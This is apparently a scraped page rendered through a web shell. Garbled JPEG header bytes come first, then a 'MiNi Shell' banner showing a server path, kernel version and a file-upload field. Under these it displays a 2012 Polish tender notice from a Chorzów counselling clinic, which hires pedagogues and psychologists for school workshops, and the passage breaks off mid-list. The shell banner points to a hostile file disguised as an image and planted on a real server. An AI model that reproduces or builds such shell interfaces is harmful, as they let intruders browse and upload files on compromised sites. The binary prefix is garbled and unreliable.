JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120126/25684-N-2012.html

<p class="kh_header"><b>Chorzów: Zatrudnienie pedagogów i psychologów dla realizacji projektu - Razem Można Lepiej Więcej - w ramach programu operacyjnego kapitał ludzki</b><br>
<b>Numer ogłoszenia: 25684 - 2012; data zamieszczenia: 26.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. św. Pawła 11, 41-500 Chorzów, woj. śląskie, tel. 32 2415-439, faks 32 2415-439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ppp.chorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zatrudnienie pedagogów i psychologów dla realizacji projektu - Razem Można Lepiej Więcej - w ramach programu operacyjnego kapitał ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest w okresie od dnia zawarcia umowy poprzetargowej do 31.12.2012 roku przeprowadzenie warsztatów psychologiczno - pedagogicznych dla nauczycieli i rodziców, prowadzenie grupy wsparcia dla nauczycieli, specjalistycznych zajęć pedagogicznych z dziećmi oraz monitorowanie wszystkich zadań dla potrzeb realizacji projektu - Razem można lepiej więcej - w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Rozwój wykształcenia i kompetencji w regionach. Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Liczba Zadań: 4. Celem głównym projektu jest profilaktyka oraz przeciwdziałanie narastaniu trudności dydaktycznych i wychowawczych na początkowych etapach nauki, a tym samym wyrównywanie szans edukacyjnych dzieci, które ze względu na swoje ograniczenia lub zaniedbanie środowiskowe są zagrożone wypadnięciem z systemu. Poszerzenie świadomości rodziców i nauczycieli w zakresie przyczyn problemów w nauce, sposobów przeciwdziałania ich powstawaniu bądź sposobów rozwiązywania już istniejących, wyposażenie ich w odpowiednią wiedzę i umiejętności podczas warsztatów, uświadomienie im odpowiedzialności za edukację dziecka oraz udzielenie im wsparcia w postaci specjalistycznych zajęć, powinno przyczynić się do zmniejszania dysproporcji edukacyjnych w trakcie procesu kształcenia, zmniejszyć ilość dzieci zagrożonych bądź nie uzyskujących promocji do następnej klasy, a w konsekwencji powinno przeciwdziałać łatwemu wypadaniu uczniów z systemu edukacji. Zajęcia z dziećmi będą odbywały się w dni nauki szkolnej (od poniedziałku do piątku) na terenie wyznaczonym przez Zamawiającego, zgodnie z harmonogramem. Termin zajęć zostanie dostosowany do planu zajęć uczniów objętych wsparciem oraz rytmu pracy Poradni (np. dostępność sali treningowej). Wykonawca zobowiązuje się do świadczenia usług w terminach określonych w harmonogramie. Zamawiający wymaga, aby w dniu podpisania umowy Wykonawca przedłożył Zamawiającemu autorski program zajęć z dziećmi, zgodny z celami projektu oraz konspekt warsztatów dla rodziców, nauczycieli, grupy wparcia. Wykonawca zobowiązany będzie uzyskać zaopiniowanie programu zajęć przez Zamawiającego. Szczegółowy opis przedmiotu zamówienia określony został w rozdziale III SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1, 79.31.12.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych w Rozdziale VII SIWZ, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych w Rozdziale VII SIWZ, na zasadzie spełnia lub nie spełnia wymaganego warunku określonych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych w Rozdziale VII SIWZ, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych w Rozdziale VII SIWZ, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń wyszczególnionych w Rozdziale VII SIWZ, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, którego oferta została wybrana jako najkorzystniejsza winien przedłożyć Zamawiającemu przed podpisaniem umowy:
- Oryginalne dokumenty potwierdzające wykształcenie w pracy na stanowisku nauczyciela psychologa/pedagoga w szkole podstawowej,
- Aktualne zaświadczenie lekarskie o spełnieniu warunków zdrowotnych niezbędnych do realizacji zajęć z uczniami w szkole podstawowej,
- Zaświadczenie o odbytym szkoleniu BHP
- Oświadczenie o niekaralności oraz oświadczenie, że nie prowadzi się przeciwko osobie postępowanie karne, czy dyscyplinarne.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany w umowie terminu realizacji przedmiotu umowy w przypadku zaistnienia okoliczności leżących po stronie Zamawiającego np. spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy, w szczególności w przypadku zmiany umowy o dofinansowanie projektu - zmianie ulegnie odpowiednio termin realizacji umowy. 
W przypadku zaistnienia w/w okoliczności  powodujących przedłużenie terminu realizacji umowy termin ten ulegnie wydłużeniu na okres niezbędny do wykonania przedmiotu umowy, tym samym Wykonawca zobowiązany jest do zachowania cen umownych. Zmiany te regulowane będą odpowiednim aneksem w okresie trwania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.chorzow.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno - Pedagogiczna, ul. Św. Pawła 11, 41-500 Chorzów, woj. śląskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2012 godzina 09:00, miejsce: Poradnia Psychologiczno - Pedagogiczna, ul. Św. Pawła 11, 41-500 Chorzów, sekretariat (Piętro I):  w godzinach 8.00-15.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Rozwój Wykształcenia i Kompetencji w Regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> warsztaty psychologiczno - pedagogiczne dla rodziców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników: 80.

2.	Liczba godzin: 5 warsztatów, po 3 godziny każdy, prowadzonych jednocześnie przez dwóch trenerów po 15 godzin każdy - godzina zajęć równa się 60 minutom.

3.	Cel:
1)	Uświadomienie rodzicom, jak ważne jest wyrobienie u dziecka umiejętności właściwej organizacji procesu uczenia się przy pomocy odpowiednich technik, co może zmniejszyć prawdopodobieństwo wypadnięcia z systemu edukacji na późniejszych etapach nauki wymagających umiejętności samodzielnej pracy;
2)	Lepsze zrozumienie problemów dydaktyczno - emocjonalnych dziecka, co ułatwi jego akceptację i poprawi relacje rodzic - dziecko;
3)	Właściwe postępowanie z dzieckiem prezentującym negatywne zachowania i reakcje.
4)	Wyposażenie rodziców w podstawową wiedzę ułatwiającą pomoc dziecku w pokonywaniu jego trudności dydaktycznych (głownie w czytaniu i matematyce) za pomocą różnych ćwiczeń, zabaw i gier dydaktycznych;
5)	Poszerzenie świadomości rodziców dotyczącej ograniczeń dziecka wynikających z jego rozwoju tak, aby rodzic mógł skutecznie je wspierać, a nie generować zaburzenia emocjonalne i społeczne.

4.	Tematyka warsztatów: 
1)	Sposoby pracy dydaktycznej z dzieckiem mającym trudności w nabywaniu umiejętności czytania i pisania;
2)	Sposoby rozwijania umiejętności operowania pojęciem liczby i usprawniania technik rachunkowych;
3)	Organizacja procesu uczenia się dziecka za pomocą odpowiednich metod i technik;
4)	Problemy emocjonalne dzieci z trudności w nauce;
5)	Postępowanie z dzieckiem reprezentującym negatywne emocje i zachowania.

5.	Wspólny słownik zamówienia CPV:
80410000-1 - Różne usługi szkolne.

6.	Termin realizacji: od podpisania umowy poprzetargowej do dnia 31.12.2012 r.

7.	Realizacja warsztatów psychologiczno - pedagogicznych nastąpi w:
1)	Szkole Podstawowej Nr 1 przy ul. Dąbrowskiego 41 w Chorzowie w następujących terminach: 
a)	20.02.2012 r., godz.17.00;
b)	27.03.2012 r., godz.17.00;
c)	02.04.2012 r., godz.17.00;
d)	17.09.2012 r., godz.17.00;
e)	02.10.2012 r., godz.17.00.
2)	Szkole Podstawowej Nr 15 przy ul. 3-go Maja 78 w Chorzowie w następujących terminach:
a)	22.02.2012 r., godz.17.00;
b)	21.03.2012 r., godz.17.00;
c)	16.05.2012 r., godz.17.00;
d)	12.09.2012 r., godz.17.00;
e)	17.10.2012 r., godz.17.00;
3)	Szkole Podstawowej Nr 17 przy ul. Łagiewnicka 18 w Chorzowie w następujących terminach:
a)	06.03.2012 r., godz.17.00;
b)	23.04.2012 r., godz.17.00;
c)	15.05.2012 r., godz.17.00;
d)	05.11.2012 r., godz.17.00;
e)	27.11.2012 r., godz.17.00;

4)	Szkole Podstawowej Nr 21 w Zespole Szkół Sportowych Nr 2 przy ul. Wolności 133 w Chorzowie w następujących terminach:
a)	12.03.2012 r., godz.17.00;
b)	16.04.2012 r., godz.17.00;
c)	14.05.2012 r., godz.17.00;
d)	12.11.2012 r., godz.17.00;
e)	19.11.2012 r., godz.17.00;

8.	Wykonawca zobowiązany jest do prowadzenia następującej dokumentacji zajęć tj.:
1)	listy obecności na każdym z warsztatów, listy potwierdzenia odbioru poczęstunku i odbioru wydanych materiałów w formie papierowej i skanowanej na płytce CD, 
2)	konspektów prowadzonych zajęć w formie papierowej i skanowanej na płytce CD,
3)	przygotowanie sali poprzez oznaczenie jej plakatem informującym o realizowanym projekcie (potwierdzenie na płytce CD).
Po zakończeniu warsztatów psychologiczno - pedagogicznych należy dostarczyć w/w dokumentację Zamawiającemu w formie papierowej i skanowanej na płytce CD..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> warsztaty psychologiczno-pedagogiczne dla nauczycieli i prowadzenie grupy wsparcia dla nauczycieli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty psychologiczno - pedagogiczne:

1.	Liczba uczestników: 50.

2.	Liczba godzin: 4 warsztaty, po 3 godziny każdy, prowadzone jednocześnie przez dwóch trenerów po 12 godzin każdy - godzina zajęć równa się 60 minutom.

3.	Cel:
1)	Wypracowanie sposobów dostosowania wymagań dydaktycznych do możliwości uczniów z deficytami, aby zminimalizować poziom ich frustracji, a zarazem motywować do wysiłku umysłowego i pokonywania istniejących trudności;
2)	Kształtowanie właściwych postaw i konsekwentnego postępowania wobec dzieci przejawiających zaburzenia w zachowaniu;
3)	Zwiększenie efektywności pracy wyrównawczej poprzez wymianę doświadczeń pomiędzy pracownikami PPP i nauczycielami prowadzącymi zespoły korekcyjno - kompensacyjne i dydaktyczno-wyrównawcze.

4.	Tematyka warsztatów: 
1)	Sposoby dostosowania wymagań edukacyjnych do możliwości psychofizycznych uczniów klas I - III;
2)	Prowadzenie ćwiczeń w ramach zespołów korekcyjno - kompensacyjnych i dydaktyczno - wyrównawczych mających usprawnić osłabione funkcje poznawcze, percepcyjne i kompensować deficyty dziecka - 2 warsztaty;
3)	Sposoby radzenia sobie z dzieckiem tzw. trudnym w klasie.
 
5.	Wspólny słownik zamówienia CPV:
80410000-1 - Różne usługi szkolne.

6.	Termin realizacji: od podpisania umowy poprzetargowej do dnia 31.12.2012 r.

7.	Realizacja warsztatów psychologicznych nastąpi w:
1)	Szkole Podstawowej Nr 1 przy ul. Dąbrowskiego 41 w Chorzowie w następujących terminach: 
a)	28.02.2012 r., godz.14.30;
b)	24.04.2012 r., godz.14.30;
c)	03.04.2012 r., godz.14.30;
d)	15.11.2012 r., godz.14.30;
2)	Szkole Podstawowej Nr 15 przy ul. 3-go Maja 78 w Chorzowie w następujących terminach:
a)	14.03.2012 r., godz.14.30;
b)	11.04.2012 r., godz.14.30;
c)	09.05.2012 r., godz.14.30;
d)	14.11.2012 r., godz.14.30;
3)	Szkole Podstawowej Nr 17 przy ul. Łagiewnicka 18 w Chorzowie w następujących terminach:
a)	07.03.2012 r., godz.14.30;
b)	28.03.2012 r., godz.14.30;
c)	20.04.2012 r., godz.14.30;
d)	13.11.2012 r., godz.14.30;
4)	Szkole Podstawowej Nr 21 w Zespole Szkół Sportowych Nr 2 przy ul. Wolności 133 w Chorzowie w następujących terminach:
a)	15.03.2012 r., godz.14.30;
b)	19.04.2012 r., godz.14.30;
c)	10.05.2012 r., godz.14.30;
d)	08.11.2012 r., godz.14.30;

8. Wykonawca zobowiązany jest do prowadzenia następującej dokumentacji zajęć tj.:
1)	listy obecności na każdym z warsztatów, listy potwierdzenia odbioru poczęstunku i odbioru wydanych materiałów w formie papierowej i skanowanej na płytce CD, 
2)	konspektów prowadzonych zajęć w formie papierowej i skanowanej na płytce CD,
3)	przygotowanie sali poprzez oznaczenie jej plakatem informującym o realizowanym projekcie (potwierdzenie na płytce CD).
Po zakończeniu warsztatów psychologiczno - pedagogicznych należy dostarczyć w/w dokumentację Zamawiającemu w formie papierowej i skanowanej na płytce CD.


Prowadzenie grupy wsparcia dla nauczycieli:

1.	Termin realizacji: od podpisania umowy poprzetargowej do dnia 31.12.2012 r.

2.	Liczba uczestników: 50.

3.	Liczba godzin: 12 spotkań po 2 godziny, prowadzone w miesiącach: luty, kwiecień, czerwiec przez dwóch trenerów po 2 godziny każdy - godzina zajęć równa się 60 minutom.

4.	Cel:
1)	Zwiększenie efektywności pracy korekcyjno - kompensacyjnej i dydaktyczno - wyrównawczej poprzez wymianę doświadczeń;
2)	Lepsze radzenie sobie w procesie dydaktyczno - wychowawczym z uczniem z problemami wychowawczymi, emocjonalnymi;
3)	Wypracowanie modelu pracy z dzieckiem przejawiającym problemy wychowawcze i emocjonalne.

5.	Wspólny słownik zamówienia CPV:
80410000-1 - Różne usługi szkolne.

6.	Realizacja grupy wsparcia nastąpi w:
1)	Szkole Podstawowej Nr 1 przy ul. Dąbrowskiego 41 w Chorzowie w następujących terminach: 
a)	21.02.2012 r., godz.14.30;
b)	18.04.2012 r., godz.14.30;
c)	14.06.2012 r., godz.14.30.
2)	Szkole Podstawowej Nr 15 przy ul. 3-go Maja 78 w Chorzowie w następujących terminach:
a)	29.02.2012 r., godz.14.30;
b)	25.04.2012 r., godz.14.30;
c)	13.06.2012 r., godz.14.30.
3)	Szkole Podstawowej Nr 17 przy ul. Łagiewnicka 18 w Chorzowie w następujących terminach:
a)	24.02.2012 r., godz.14.30;
b)	13.04.2012 r., godz.14.30;
c)	19.06.2012 r., godz.14.30.
4)	Szkole Podstawowej Nr 21 w Zespole Szkół Sportowych Nr 2 przy ul. Wolności 133 w Chorzowie w następujących terminach:
a)	23.02.2012 r., godz.14.30;
b)	12.04.2012 r., godz.14.30;
c)	14.06.2012 r., godz.14.30.

5. Wykonawca zobowiązany jest do prowadzenia następującej dokumentacji zajęć tj.:
1)	listy obecności na każdym ze spotkań, listy potwierdzenia odbioru poczęstunku i odbioru wydanych materiałów w formie papierowej i skanowanej na płytce CD, 
2)	konspektów prowadzonych zajęć w formie papierowej i skanowanej na płytce CD,
3)	przygotowanie sali poprzez oznaczenie jej plakatem informującym o realizowanym projekcie (potwierdzenie na płytce CD).
Po zakończeniu spotkań należy dostarczyć w/w dokumentację Zamawiającemu w formie papierowej i skanowanej na płytce CD..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie nt: zajęcia specjalistyczne pedagogiczne dla dzieci z klas I-II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników: 80.

2.	Liczba godzin: 8 grup po 10 dzieci; zajęcia dla każdej z grup 1 raz w tygodniu po 2 godziny od lutego do czerwca, zgodnie z przedstawionych harmonogramem, zajęcia prowadzone jednocześnie przez dwóch trenerów (200 godzin zajęć dla każdego z prowadzących - Godzin zajęć równa się 60 minutom.

3.	Cel:
1)	Rozwijanie i usprawnianie podstawowych umiejętności dydaktycznych celem wyrównywania ich czas edukacyjnych;
2)	Korekcja i kompensacja deficytów rozwojowych, które tkwią u podłoża niepowodzeń szkolnych; 
3)	Usprawnienie funkcji percepcyjno-motorycznych i umiejętności kompensowania istniejących deficytów rozwojowych;
